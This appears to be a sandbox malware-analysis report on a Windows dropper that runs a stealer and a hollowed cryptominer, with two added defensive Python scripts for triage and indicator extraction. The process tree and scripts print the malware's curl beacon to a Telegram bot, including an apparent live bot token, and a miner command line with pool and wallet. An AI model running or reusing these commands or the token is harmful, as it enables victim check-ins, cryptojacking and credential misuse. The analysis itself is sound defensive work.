Analysis
- max time kernel: 25s
- max time network: 39s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 01-02-2022 17:07
Static task: static1
Behavioral task: behavioral1
- Sample: b81f2f2d3c122a53a0c99f0b21e0ff79.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: b81f2f2d3c122a53a0c99f0b21e0ff79.exe
- Resource: win10v2004-en-20220113
General
- Target: b81f2f2d3c122a53a0c99f0b21e0ff79.exe
- Size: 6.9MB
- MD5: b81f2f2d3c122a53a0c99f0b21e0ff79
- SHA1: 9b7e2b6b3464b5130f05b10f170e07fc8356ad2e
- SHA256: 914cd602a58f69dd35dd207d8128807926a139f27f4d8b7b2b958041783bc10c
- SHA512: 51ca133984ade0dbf6d926185a948c13f421da2dbe23b51bb2df22fd3c4c153de593e993b497f97ea18ae9e4060a14a3cdb537c27bc2922483235d2563402c76
Malware Config
Signatures
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
- Executes dropped EXE (2 IoCs)
  Processes:
    PID 4596  steal.exe
    PID 3584  123.exe
- YARA rule match: upx
  Resource: behavioral2/memory/1532-137-0x0000000140000000-0x000000014274C000-memory.dmp (rule: upx)
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    123.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
    123.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- YARA rule match: themida
  Resources:
    C:\Users\Admin\AppData\Local\Temp\123.exe (rule: themida)
    C:\Users\Admin\AppData\Local\Temp\123.exe (rule: themida)
    behavioral2/memory/3584-134-0x00007FF703C90000-0x00007FF704594000-memory.dmp (rule: themida)
    behavioral2/memory/3584-135-0x00007FF703C90000-0x00007FF704594000-memory.dmp (rule: themida)
    behavioral2/memory/3584-136-0x00007FF703C90000-0x00007FF704594000-memory.dmp (rule: themida)
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
    123.exe  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"
- Checks whether UAC is enabled (1 IoC)
  Processes:
    123.exe  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
- Suspicious use of SetThreadContext (2 IoCs)
  Processes:
    PID 3584 (123.exe) set thread context of PID 1532 (bfsvc.exe)
    PID 3584 (123.exe) set thread context of PID 4568 (explorer.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of WriteProcessMemory (33 IoCs)
  Processes (source PID -> target PID: number of write events):
    4956 (b81f2f2d3c122a53a0c99f0b21e0ff79.exe) -> 4596 (steal.exe): 3
    4956 (b81f2f2d3c122a53a0c99f0b21e0ff79.exe) -> 3584 (123.exe): 2
    3584 (123.exe) -> 2160 (curl.exe): 2
    3584 (123.exe) -> 1532 (bfsvc.exe): 9
    3584 (123.exe) -> 4568 (explorer.exe): 17
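The four behaviours the sandbox flags for 123.exe (both BIOS-version values read, a Run key pointing into AppData, an EnableLUA query, and SetThreadContext against two C:\Windows binaries) are individually weak signals; together they are the loader-plus-injection pattern worth alerting on. The script below, added here as an example and not part of the sandbox report or its signature engine, runs that correlation over an event list constructed from the Signatures section. The (pid, image, kind, detail) event shape, the rule names and the "two BIOS values from a user-writable image" threshold are this example's own assumptions.

```python
"""Rule-based triage of the behavioural events in this report's Signatures section.

Added example, not part of the sandbox report or its signature engine. EVENTS is
constructed from the report (123.exe, PID 3584); the event shape, rule names and
thresholds are this example's own assumptions.
"""
import re

# Constructed from the report's Signatures section: (pid, image, kind, detail).
EVENTS = [
    (3584, r"C:\Users\Admin\AppData\Local\Temp\123.exe", "reg_query",
     r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    (3584, r"C:\Users\Admin\AppData\Local\Temp\123.exe", "reg_query",
     r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion"),
    (3584, r"C:\Users\Admin\AppData\Local\Temp\123.exe", "reg_set",
     r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = '
     r'"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"'),
    (3584, r"C:\Users\Admin\AppData\Local\Temp\123.exe", "reg_query",
     r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"),
    (3584, r"C:\Users\Admin\AppData\Local\Temp\123.exe", "set_thread_context",
     r"1532 C:\Windows\bfsvc.exe"),
    (3584, r"C:\Users\Admin\AppData\Local\Temp\123.exe", "set_thread_context",
     r"4568 C:\Windows\explorer.exe"),
]

# Paths under a profile's AppData are writable without admin rights; a persistence
# target or an injecting image living there is the suspicious part of each rule.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)
BIOS_KEYS = re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", re.I)
RUN_KEY_VALUE = re.compile(r'\\CurrentVersion\\Run\\[^\\=]+=\s*"?(?P<target>[^"]+)"?', re.I)
SYSTEM_DIR = re.compile(r"^C:\\Windows\\", re.I)


def triage(events):
    """Return {pid: [rule, ...]} with rules listed in the order they fired."""
    hits = {}
    bios_probes = {}  # pid -> number of BIOS-version values queried so far
    for pid, image, kind, detail in events:
        fired = hits.setdefault(pid, [])
        if kind == "reg_query" and BIOS_KEYS.search(detail):
            # One BIOS query is common for inventory tools; both SystemBiosVersion and
            # VideoBiosVersion from a Temp-dir binary is the sandbox-evasion pattern.
            bios_probes[pid] = bios_probes.get(pid, 0) + 1
            if bios_probes[pid] == 2 and USER_WRITABLE.search(image):
                fired.append("anti_sandbox_bios_probe")
        elif kind == "reg_query" and detail.upper().endswith(r"\POLICIES\SYSTEM\ENABLELUA"):
            fired.append("uac_status_check")
        elif kind == "reg_set":
            m = RUN_KEY_VALUE.search(detail)
            if m:
                # The report prints the value with escaped backslashes; normalise first.
                target = m.group("target").replace("\\\\", "\\")
                if USER_WRITABLE.search(target):
                    fired.append("run_key_to_appdata")
        elif kind == "set_thread_context":
            target_pid, target_image = detail.split(" ", 1)
            # A user-writable image redirecting execution inside a C:\Windows binary
            # is the hollowing/injection pattern (here bfsvc.exe and explorer.exe).
            if USER_WRITABLE.search(image) and SYSTEM_DIR.match(target_image):
                name = target_image.rsplit("\\", 1)[-1].lower()
                fired.append(f"thread_context_hijack:{target_pid}:{name}")
    return hits


if __name__ == "__main__":
    for pid, rules in triage(EVENTS).items():
        print(pid, rules)
```

Run against the constructed events, `triage` returns five rule hits for PID 3584, in the order the sandbox lists them. On a real endpoint the same logic applies to Sysmon event IDs 13 (registry set), 10/8 (process access and remote thread) or EDR telemetry; the WriteProcessMemory counts in the report (9 writes into bfsvc.exe, 17 into explorer.exe) are the companion signal that the thread-context change followed a payload write.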
Processes
- C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe (PID 4956)
  Command line: "C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\steal.exe (PID 4596)
    Command line: C:\Users\Admin\AppData\Local\Temp\steal.exe
    - Executes dropped EXE
  - C:\Users\Admin\AppData\Local\Temp\123.exe (PID 3584)
    Command line: C:\Users\Admin\AppData\Local\Temp\123.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SYSTEM32\curl.exe (PID 2160)
      Command line: curl "https://api.telegram.org/bot5091596467:AAFHA5degKMEAHZHV4pD9gfMs7VtZ9Z4EBs/sendMessage?chat_id=-1001750796132&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: ga%0A(Windows Defender has been turned off)"
    - C:\Windows\bfsvc.exe (PID 1532)
      Command line: C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22
    - C:\Windows\explorer.exe (PID 4568)
      Command line: C:\Windows\explorer.exe "qwe1" "Microsoft%20Basic%20Display%20Adapter" "ga" "etc"
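The three child command lines carry everything a responder needs to block and attribute this sample: the Telegram bot token and chat ID used for the "New worker!" check-in, and the Ethereum Classic pool, wallet and worker name passed to the miner. Note that bfsvc.exe is a legitimate Windows binary; the mining arguments belong to the payload 123.exe wrote into PID 1532 before changing its thread context (the UPX-packed 39.3MB dump of that process is listed under Downloads), so the image path is not the indicator, the argument list is. The script below, added here as an example and not part of the sandbox report, extracts those indicators from the command lines copied from the process tree and cross-checks that the beacon text and the explorer.exe arguments describe the same host. The field names and regexes are this example's own assumptions.

```python
"""Pull the reportable indicators out of the command lines in this process tree.

Added example, not part of the sandbox report. CURL_CMDLINE, MINER_CMDLINE and
EXPLORER_CMDLINE are copied from the report; the field names and regexes are
this example's own assumptions.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Copied from the report's process tree (PID 2160, PID 1532, PID 4568).
CURL_CMDLINE = (
    'curl "https://api.telegram.org/bot5091596467:AAFHA5degKMEAHZHV4pD9gfMs7VtZ9Z4EBs/'
    "sendMessage?chat_id=-1001750796132&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft "
    'Basic Display Adapter%0AWorker Tag: ga%0A(Windows Defender has been turned off)"'
)
MINER_CMDLINE = (
    r"C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 "
    r"--user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22"
)
EXPLORER_CMDLINE = r'C:\Windows\explorer.exe "qwe1" "Microsoft%20Basic%20Display%20Adapter" "ga" "etc"'

# Telegram bot tokens are "<numeric bot id>:<secret>" and sit in the URL path.
BOT_PATH = re.compile(r"^/bot(?P<token>(?P<bot_id>\d+):[A-Za-z0-9_-]{30,})/(?P<method>\w+)$")
ETH_ADDRESS = re.compile(r"^0x[0-9a-fA-F]{40}$")


def parse_telegram_beacon(cmdline):
    """Return bot id, full token, API method, chat id and message lines from a curl beacon."""
    m = re.search(r'"(https?://[^"]+)"', cmdline)  # the URL is the quoted argument
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = BOT_PATH.match(url.path)
    if url.hostname != "api.telegram.org" or not path:
        return None
    query = parse_qs(url.query)  # decodes %0A -> "\n" and %F0%9F%99%88 -> the emoji
    return {
        "bot_id": path.group("bot_id"),
        "token": path.group("token"),
        "method": path.group("method"),
        "chat_id": query.get("chat_id", [None])[0],
        "text_lines": query.get("text", [""])[0].split("\n"),
    }


def parse_miner_args(cmdline):
    """Return algo, pool, wallet and worker from an ethminer-style '--key value' line."""
    toks = cmdline.split()
    opts = {}
    for i, tok in enumerate(toks):
        if tok.startswith("--") and i + 1 < len(toks) and not toks[i + 1].startswith("--"):
            opts[tok[2:]] = toks[i + 1]
    host, _, port = opts.get("pool", "").rpartition(":")
    return {
        "image": toks[0],
        "algo": opts.get("algo"),
        "pool_host": host or None,
        "pool_port": int(port) if port.isdigit() else None,
        "wallet": opts.get("user"),
        "wallet_is_eth_address": bool(ETH_ADDRESS.match(opts.get("user", ""))),
        "worker": opts.get("worker"),
    }


def parse_explorer_args(cmdline):
    """Return the URL-decoded quoted arguments handed to the hollowed explorer.exe."""
    return [unquote(a) for a in re.findall(r'"([^"]*)"', cmdline)]


def correlate():
    """Check that the beacon's GPU and worker tag are the same values explorer.exe receives."""
    beacon = parse_telegram_beacon(CURL_CMDLINE)
    miner = parse_miner_args(MINER_CMDLINE)
    args = parse_explorer_args(EXPLORER_CMDLINE)
    fields = dict(line.split(": ", 1) for line in beacon["text_lines"] if ": " in line)
    return {
        "gpu_matches_explorer_arg": fields.get("GPU") in args,
        "tag_matches_explorer_arg": fields.get("Worker Tag") in args,
        "pool": f'{miner["pool_host"]}:{miner["pool_port"]}',
        "wallet": miner["wallet"],
        "telegram_chat": beacon["chat_id"],
    }


if __name__ == "__main__":
    print(parse_telegram_beacon(CURL_CMDLINE))
    print(parse_miner_args(MINER_CMDLINE))
    print(correlate())
```

The bot token in the path is a credential: anyone holding it can call the same API method, so it is also the value to submit when reporting the bot. The pool host and port, the wallet and the worker name are the durable indicators for network and endpoint blocking; the Telegram message text (GPU model, tag, the claim that Defender was turned off) is the operator's own inventory of the victim and is useful for attribution across samples.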
Downloads
- C:\Users\Admin\AppData\Local\Temp\123.exe
  MD5: f18bb590bdf69d8571ad7da70faa921b
  SHA1: 47f58cf547153e5fc89165fbd83b118c51793569
  SHA256: 0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69
  SHA512: fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817
- C:\Users\Admin\AppData\Local\Temp\steal.exe
  MD5: 231147ca2fbb27db182411c726d9489e
  SHA1: 540fac37b19f2361973f3771a9ce4453dd1d370f
  SHA256: 9bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28
  SHA512: a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691
- memory/1532-137-0x0000000140000000-0x000000014274C000-memory.dmp
  Filesize: 39.3MB
- memory/3584-134-0x00007FF703C90000-0x00007FF704594000-memory.dmp
  Filesize: 9.0MB
- memory/3584-135-0x00007FF703C90000-0x00007FF704594000-memory.dmp
  Filesize: 9.0MB
- memory/3584-136-0x00007FF703C90000-0x00007FF704594000-memory.dmp
  Filesize: 9.0MB
- memory/4568-138-0x0000000140000000-0x000000014002A000-memory.dmp
  Filesize: 168KB